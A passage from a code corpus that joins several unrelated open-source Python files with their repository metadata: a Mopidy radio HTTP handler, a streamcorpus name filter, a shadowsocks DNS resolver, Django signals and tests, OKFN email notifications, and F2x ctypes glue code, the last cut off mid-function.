cur.execute("insert into VoteToSkip (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'false', 'failedVoteReason':'Sorry you have exceeded your daily skipping quota for this track, but dont worry if the song is that bad Im sure someone else will click the button '}))
self.wfile.close()
def getTrackVotes(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesCallback', {'trackVotes':row[0]}))
self.wfile.close()
def getTrackRating(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM UpVote WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackRatingCallback', {'trackRating':row[0]}))
self.wfile.close()
def getTrackVotesAndRating(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM UpVote WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
upVoteRow = cur.fetchone()
print upVoteRow[0]
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
skipRow = cur.fetchone()
print skipRow[0]
totalVotes = skipRow[0] - upVoteRow[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesAndRatingCallback', {'totalTrackVotes':totalVotes, "skipVotes":skipRow[0], "rating":upVoteRow[0], "trackUri":trackUri[0] }))
self.wfile.close()
def getTrendingTracks(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("select trackuri, TrackName, Artist, Album, count(*) as totalvotes from upvote group by trackuri order by totalvotes desc;")
con.commit()
rows = cur.fetchall()
#rows = [ dict(rec) for rec in recs ]
self.wfile.write('{0}({1})'.format('jsonpGetTrendingTracksCallback', {'trendingTracks':json.dumps(rows)}))
self.wfile.close()
def rebootPi(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
command = "/usr/bin/sudo /sbin/shutdown -r now"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print output
def shutdownPi(self):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
command = "/usr/bin/sudo /sbin/shutdown -h now"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print output
|
paulburkinshaw/mopidy-radio-pi
|
mopidy_radio_pi/static/MyHandler.py
|
Python
|
apache-2.0
| 11,919 | 0.043544 |
'''python example of filtering through strings from a
streamcorpus.StreamItem to find names from a FilterName
'''
from __future__ import absolute_import
import logging
import os
import sys
from cStringIO import StringIO
## import the thrift library
from thrift import Thrift
from thrift.transport.TTransport import TBufferedTransport
from thrift.protocol.TBinaryProtocol import TBinaryProtocol
## pure python TBinaryProtocol is slow, so attempt to replace it with
## faster implementation
from thrift.protocol.TBinaryProtocol import TBinaryProtocolAccelerated
fastbinary_import_failure = None
try:
from thrift.protocol import fastbinary
raise Exception() ## don't let this happen
## use faster C program to read/write
TBinaryProtocol = TBinaryProtocolAccelerated
except Exception, exc:
fastbinary_import_failure = exc
## fall back to pure python
## thrift message classes from core streamcorpus library
from streamcorpus import StreamItem, Rating, Label, Annotator, Offset, OffsetType, Target
## thrift message class from this package
from streamcorpus_filter.ttypes import FilterNames
logger = logging.getLogger(__name__)
class Filter(object):
def __init__(self):
self.filter_names = None
self._names = None
self.token_boundary_chars = set([' ', '\n', '\s', '\t', '\r'])
def load_filter_names(self, path_to_thrift_message):
'''reads a FilterNames message from a flat file
'''
if not os.path.exists(path_to_thrift_message):
raise Exception('path does not exist: %r' % path_to_thrift_message)
fh = open(path_to_thrift_message, 'rb')
# This is a lame workaround to a bug in Thrift experienced
# during unit tests. Thrift cannot handle files in
# non-blocking mode that could return from .read() with less
# than the asked for data. read(-1) seems to force reading all
# the data, and once we have it all in memory it is safe for
# Thrift to read it.
raw = fh.read(-1)
logger.debug('read %s bytes of %r', len(raw), path_to_thrift_message)
fh = StringIO(raw)
i_transport = TBufferedTransport(fh)
i_protocol = TBinaryProtocol(i_transport)
self.filter_names = FilterNames()
self.filter_names.read(i_protocol)
## not actually required in CPython
fh.close()
def save_filter_names(self, path_to_thrift_message=None, file_obj=None):
'''writes a FilterNames message to a flat file
'''
if path_to_thrift_message:
if os.path.exists(path_to_thrift_message):
print('warning: overwriting: %r' % path_to_thrift_message)
o_transport = open(path_to_thrift_message, 'wb')
elif file_obj:
o_transport = file_obj
else:
raise Exception('must specify either path_to_thrift_message or file_obj')
o_protocol = TBinaryProtocol(o_transport)
self.filter_names.write(o_protocol)
o_transport.close()
def invert_filter_names(self):
'''constructs FilterNames.name_to_target_ids from
FilterNames.target_id_to_names
'''
if self.filter_names.name_to_target_ids:
print('warning: replacing existing FilterNames.name_to_target_ids')
self.filter_names.name_to_target_ids = dict()
for target_id in self.filter_names.target_id_to_names:
for name in self.filter_names.target_id_to_names[target_id]:
if name not in self.filter_names.name_to_target_ids:
self.filter_names.name_to_target_ids[name] = list()
self.filter_names.name_to_target_ids[name].append(target_id)
print('%d names, %d target_ids' % (len(self.filter_names.name_to_target_ids),
len(self.filter_names.target_id_to_names)))
def compile_filters(self):
if not self.filter_names:
raise Exception('must first load FilterNames')
## for this simple example, all we do is convert the utf-8
## from FilterNames into unicode
self._names = dict()
for name in self.filter_names.name_to_target_ids:
self._names[name.decode('utf8')] = self.filter_names.name_to_target_ids[name]
def register_token_boundary_char(self, char):
'''
add a unicode character to the set of symbols consider
equivalent to "token boundary"
'''
self.token_boundary_chars.add(char)
def advance_passed_boundary(self):
'''
advanced self.text_position passed the current boundary, if
possible, and detect if a token boundary was passed.
'''
start_text_position = self.text_position
while self.text_position < len(self.text) and self.text[self.text_position] in self.token_boundary_chars:
self.text_position += 1
if self.text_position == len(self.text):
return False
elif start_text_position != self.text_position:
## consumed some characters, so we must have reached a new token
return True
elif self.text_position == 0:
## special case for start of document
return True
else:
## have not passed a boundary
return False
def advance_to_boundary(self):
'''
advanced self.text_position to the next boundary or end of self.text
'''
while self.text_position < len(self.text) and self.text[self.text_position] not in self.token_boundary_chars:
self.text_position += 1
def apply_filters(self, stream_item, content_form='clean_html'):
'''iterates over the characters in stream_item.body.<content_form>
looking for strings that exact match keys in
self.filter_names.name_to_target_ids'''
if not self._names:
raise Exception('must first have a compiled set of filters')
annotator_id = 'streamcorpus-filter'
annotator = Annotator(annotator_id=annotator_id)
text = getattr(stream_item.body, content_form)
## pass text around by reference as a property on this class instance
self.text = text.decode('utf8')
## inefficient brute force loop for each name
for name in self._names:
name_tokens = name.split('\\W')
name_token_i = 0
self.text_position = 0
first_char_position = None
while name_tokens and self.text_position < len(self.text):
#print 'starting', self.text_position, name_token_i, name_tokens
reached_start_of_new_token = self.advance_passed_boundary()
if not reached_start_of_new_token:
self.advance_to_boundary()
continue
name_tok = name_tokens[name_token_i]
#print 'on a token', self.text_position, name_token_i, name_tok, self.text[self.text_position:self.text_position + len(name_tok)]
if name_tok != self.text[self.text_position : self.text_position + len(name_tok)]:
name_token_i = 0
first_char_position = None
self.text_position += 1
else:
name_token_i += 1
self.text_position += len(name_tok)
if first_char_position is None:
first_char_position = self.text_position
if name_token_i == len(name_tokens):
print 'found one!'
## reset state machine for next possible match in this document
name_token_i = 0
for target_id in self._names[name]:
target = Target(target_id=target_id)
rating = Rating(annotator=annotator, target=target)
label = Label( annotator=annotator, target=target)
label.offsets[OffsetType.CHARS] = Offset(
type=OffsetType.CHARS,
first=first_char_position,
length=self.text_position)
if annotator_id not in stream_item.body.labels:
stream_item.body.labels[annotator_id] = list()
stream_item.body.labels[annotator_id].append(label)
if annotator_id not in stream_item.ratings:
stream_item.ratings[annotator_id] = list()
stream_item.ratings[annotator_id].append(rating)
|
streamcorpus/streamcorpus-filter
|
py/src/streamcorpus_filter/_filter.py
|
Python
|
mit
| 8,706 | 0.005628 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[_A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
return nlen + 4, (name, None, record_type, record_class, None, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == b'.':
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_FIRST = 0
STATUS_SECOND = 1
class DNSResolver(object):
def __init__(self, server_list=None, prefer_ipv6=False):
self._loop = None
self._hosts = {}
self._hostname_status = {}
self._hostname_to_cb = {}
self._cb_to_hostname = {}
self._cache = lru_cache.LRUCache(timeout=300)
self._sock = None
if server_list is None:
self._servers = None
self._parse_resolv()
else:
self._servers = server_list
if prefer_ipv6:
self._QTYPES = [QTYPE_AAAA, QTYPE_A]
else:
self._QTYPES = [QTYPE_A, QTYPE_AAAA]
self._parse_hosts()
# TODO monitor hosts change and reload hosts
# TODO parse /etc/gai.conf and follow its rules
def _parse_resolv(self):
self._servers = []
try:
with open('/etc/resolv.conf', 'rb') as f:
content = f.readlines()
for line in content:
line = line.strip()
if not (line and line.startswith(b'nameserver')):
continue
parts = line.split()
if len(parts) < 2:
continue
server = parts[1]
if common.is_ip(server) == socket.AF_INET:
if type(server) != str:
server = server.decode('utf8')
self._servers.append(server)
except IOError:
pass
if not self._servers:
self._servers = ['8.8.4.4', '8.8.8.8']
def _parse_hosts(self):
etc_path = '/etc/hosts'
if 'WINDIR' in os.environ:
etc_path = os.environ['WINDIR'] + '/system32/drivers/etc/hosts'
try:
with open(etc_path, 'rb') as f:
for line in f.readlines():
line = line.strip()
parts = line.split()
if len(parts) < 2:
continue
ip = parts[0]
if not common.is_ip(ip):
continue
for i in range(1, len(parts)):
hostname = parts[i]
if hostname:
self._hosts[hostname] = ip
except IOError:
self._hosts['localhost'] = '127.0.0.1'
def add_to_loop(self, loop):
if self._loop:
raise Exception('already add to loop')
self._loop = loop
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
loop.add(self._sock, eventloop.POLL_IN, self)
loop.add_periodic(self.handle_periodic)
def _call_callback(self, hostname, ip, error=None):
callbacks = self._hostname_to_cb.get(hostname, [])
for callback in callbacks:
if callback in self._cb_to_hostname:
del self._cb_to_hostname[callback]
if ip or error:
callback((hostname, ip), error)
else:
callback((hostname, None),
Exception('unknown hostname %s' % hostname))
if hostname in self._hostname_to_cb:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _handle_data(self, data):
response = parse_response(data)
if response and response.hostname:
hostname = response.hostname
ip = None
for answer in response.answers:
if answer[1] in (QTYPE_A, QTYPE_AAAA) and \
answer[2] == QCLASS_IN:
ip = answer[0]
break
if not ip and self._hostname_status.get(hostname, STATUS_SECOND) \
== STATUS_FIRST:
self._hostname_status[hostname] = STATUS_SECOND
self._send_req(hostname, self._QTYPES[1])
else:
if ip:
self._cache[hostname] = ip
self._call_callback(hostname, ip)
elif self._hostname_status.get(hostname, None) \
== STATUS_SECOND:
for question in response.questions:
if question[1] == self._QTYPES[1]:
self._call_callback(hostname, None)
break
def handle_event(self, sock, fd, event):
if sock != self._sock:
return
if event & eventloop.POLL_ERR:
logging.error('dns socket err')
self._loop.remove(self._sock)
self._sock.close()
# TODO when dns server is IPv6
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.SOL_UDP)
self._sock.setblocking(False)
self._loop.add(self._sock, eventloop.POLL_IN, self)
else:
data, addr = sock.recvfrom(1024)
if addr[0] not in self._servers:
logging.warn('received a packet other than our dns')
return
self._handle_data(data)
def handle_periodic(self):
self._cache.sweep()
def remove_callback(self, callback):
hostname = self._cb_to_hostname.get(callback)
if hostname:
del self._cb_to_hostname[callback]
arr = self._hostname_to_cb.get(hostname, None)
if arr:
arr.remove(callback)
if not arr:
del self._hostname_to_cb[hostname]
if hostname in self._hostname_status:
del self._hostname_status[hostname]
def _send_req(self, hostname, qtype):
req = build_request(hostname, qtype)
for server in self._servers:
logging.debug('resolving %s with type %d using server %s',
hostname, qtype, server)
self._sock.sendto(req, (server, 53))
def resolve(self, hostname, callback):
if type(hostname) != bytes:
hostname = hostname.encode('utf8')
if not hostname:
callback(None, Exception('empty hostname'))
elif common.is_ip(hostname):
callback((hostname, hostname), None)
elif hostname in self._hosts:
logging.debug('hit hosts: %s', hostname)
ip = self._hosts[hostname]
callback((hostname, ip), None)
elif hostname in self._cache:
logging.debug('hit cache: %s', hostname)
ip = self._cache[hostname]
callback((hostname, ip), None)
else:
if not is_valid_hostname(hostname):
callback(None, Exception('invalid hostname: %s' % hostname))
return
arr = self._hostname_to_cb.get(hostname, None)
if not arr:
self._hostname_status[hostname] = STATUS_FIRST
self._send_req(hostname, self._QTYPES[0])
self._hostname_to_cb[hostname] = [callback]
self._cb_to_hostname[callback] = hostname
else:
arr.append(callback)
# TODO send again only if waited too long
self._send_req(hostname, self._QTYPES[0])
def close(self):
if self._sock:
if self._loop:
self._loop.remove_periodic(self.handle_periodic)
self._loop.remove(self._sock)
self._sock.close()
self._sock = None
def test():
dns_resolver = DNSResolver()
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
global counter
counter = 0
def make_callback():
global counter
def callback(result, error):
global counter
# TODO: what can we assert?
print(result, error)
counter += 1
if counter == 9:
dns_resolver.close()
loop.stop()
a_callback = callback
return a_callback
assert(make_callback() != make_callback())
dns_resolver.resolve(b'google.com', make_callback())
dns_resolver.resolve('google.com', make_callback())
dns_resolver.resolve('example.com', make_callback())
dns_resolver.resolve('ipv6.google.com', make_callback())
dns_resolver.resolve('www.facebook.com', make_callback())
dns_resolver.resolve('ns2.google.com', make_callback())
dns_resolver.resolve('invalid.@!#$%^&$@.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
loop.run()
if __name__ == '__main__':
test()
|
plus1s/shadowsocks-py-mu
|
shadowsocks/asyncdns.py
|
Python
|
apache-2.0
| 17,651 | 0.00017 |
from django.dispatch import Signal
pre_save = Signal(providing_args=['instance', 'action', ])
post_save = Signal(providing_args=['instance', 'action', ])
pre_delete = Signal(providing_args=['instance', 'action', ])
post_delete = Signal(providing_args=['instance', 'action', ])
|
thoas/django-sequere
|
sequere/contrib/timeline/signals.py
|
Python
|
mit
| 279 | 0 |
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
class EmailNotification:
msg_from = 'OKFN team <noreply@okfn.org>'
def __init__(self, msg_to, msg_from=None):
self.msg_to = msg_to
if msg_from:
self.msg_from = msg_from
def send_mail(self, subject, message):
send_mail(subject, message, self.msg_from, [self.msg_to],
fail_silently=True)
def create_notification(self, brand_nm, bsin):
brand_url = reverse('brand', args=(bsin,))
subject = "%s added to the OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand %s was added to the OKFN brand respository under BSIN %s.
More details at http://product.okfn.org%s .
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, bsin, brand_url)
self.send_mail(subject, message)
def delete_notification(self, brand_nm, comment):
subject = "%s rejected from OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand proposal for %s was rejected from the OKFN brand respository.
Moderator comment : %s
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, comment)
self.send_mail(subject, message)
|
okfn/brand-manager
|
manager/apps/brand/notifications.py
|
Python
|
mit
| 1,306 | 0 |
import unittest
from django.dispatch.saferef import safeRef
from django.utils.six.moves import xrange
class Test1(object):
def x(self):
pass
def test2(obj):
pass
class Test2(object):
def __call__(self, obj):
pass
class SaferefTests(unittest.TestCase):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Test1()
ts.append(t)
s = safeRef(t.x, self._closure)
ss.append(s)
ts.append(test2)
ss.append(safeRef(test2, self._closure))
for x in xrange(30):
t = Test2()
ts.append(t)
s = safeRef(t, self._closure)
ss.append(s)
self.ts = ts
self.ss = ss
self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safeRef(t.x) in self.ss)
def testValid(self):
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertTrue(safeRef(t.x) in sd)
else:
self.assertTrue(safeRef(t) in sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1
|
Beeblio/django
|
tests/dispatch/tests/test_saferef.py
|
Python
|
bsd-3-clause
| 1,886 | 0 |
# Copyright 2018 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
F2x 'ctypes' template glue library.
This module contains helpers that are used by the code generated by the 'ctypes' library. It mainly deals with setting
correct C interfaces and converting values between FORTRAN and Python types. Arrays are handled by NumPy.
Usually there should be no need to access this module directly.
"""
import ctypes
import numpy
def constructor(cfunc):
"""
Make a C function a constructor.
The C interface is defined to accept no parameters and return a void pointer. It is also wrapped as a staticmethod
to allow usage in classes.
:param cfunc: The plain C function as imported from the C library using ctypes.
:return: A static method with appropriate C interface.
"""
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
return staticmethod(cfunc)
def destructor(cfunc):
"""
Make a C function a destructor.
Destructors accept pointers to void pointers as argument. They are also wrapped as a staticmethod for usage in
classes.
:param cfunc: The C function as imported by ctypes.
:return: The configured destructor.
"""
cfunc.argtypes = [ctypes.POINTER(ctypes.c_void_p)]
cfunc.restype = None
return staticmethod(cfunc)
def array_from_pointer(ctype, dims, ptr, strlen=None, dealloc=None):
"""
Helper that converts a pointer to a ctypes array.
The array will have flat layout.
:param ctype: Type of the contents of the array.
:param dims: List with the current sizes of the array.
:param ptr: Address of array memory.
:return: A ctypes array that points to the referred data.
"""
class ManagedArray(numpy.ndarray):
def __array_finalize__(self, obj):
if isinstance(obj, ManagedArray):
self.f2x_parent = obj
def __del__(self):
if hasattr(self, 'f2x_ptr'):
array_size = ctypes.c_int(len(self))
self.f2x_dealloc(ctypes.byref(array_size), ctypes.byref(self.f2x_ptr))
array_size = 1
for size in dims:
array_size *= size
array_type = ctype * array_size
c_array = array_type.from_address(ctypes.addressof(ptr.contents))
if strlen is None:
array = numpy.ctypeslib.as_array(c_array, dims)
else:
array = numpy.char.array(c_array, itemsize=strlen, copy=False, order='F')
if dealloc is not None:
array = array.view(ManagedArray)
array.f2x_dealloc = dealloc
array.f2x_ptr = ptr
return array
class NullPointerError(BaseException):
"""
This exception is raised when Python wrapper code tries to access a C pointer that was not (yet) allocated (i.e. is
null). This exception is handled to automatically allocate dynamic arrays upon first assignment.
"""
pass
def _getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctypes.c_void_p
def _get(ptr):
cptr = cfunc(ptr)
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get(ptr):
cptr = ctypes.c_char_p(0)
cfunc(ptr, ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctype
return cfunc
def _setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ptr, ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cvalue = ctype(value)
cfunc(ptr, ctypes.byref(cvalue))
return _set
def _allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = None
return cfunc
class Field(object):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _getter(ctype, getter)
self.setter = _setter(ctype, setter, strlen)
self.allocator = _allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
return self.getter(instance.ptr)
def __set__(self, instance, value):
if self.setter:
self.setter(instance.ptr, value)
elif issubclass(self.ctype, FType):
try:
target = self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
target = self.getter(instance.ptr)
target.copy_from(value)
else:
raise AttributeError("Not settable.")
def _global_getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
def _get():
cptr = cfunc()
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get():
cptr = ctypes.c_char_p(0)
cfunc(ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = []
cfunc.restype = ctype
return cfunc
def _global_setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
